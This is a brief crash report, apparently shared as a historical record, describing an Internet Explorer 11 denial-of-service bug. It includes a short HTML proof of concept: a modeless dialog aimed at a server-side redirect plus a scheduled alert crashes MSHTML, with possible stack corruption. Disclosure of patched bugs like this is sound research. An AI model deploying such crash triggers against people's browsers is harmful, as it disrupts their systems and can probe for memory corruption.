A brief crash report. Opening a modeless dialog pointed at a server-side redirect and then immediately scheduling an alert inside that dialog produced an assertion failure in MSHTML!CMarkup::OnLoadStatusDone.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_modelessDialog_redirect</title>
</head>
<body>
<script>
function main()
{
	var win = showModelessDialog("redirect.aspx", null, "dialogwidth=400px;dialogHeight=300px");
	win.setTimeout('alert("Wait a second to see the browser crashing...")');
}
</script>
</body>
</html>

The dialog loaded redirect.aspx, which issued a server-side redirect. The setTimeout alert fired while the redirect was in progress, hitting MSHTML!CMarkup::OnLoadStatusDone+0x593 at a point where the markup was in an inconsistent state. The debugger noted possible stack corruption, making the exploitability classification unknown.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.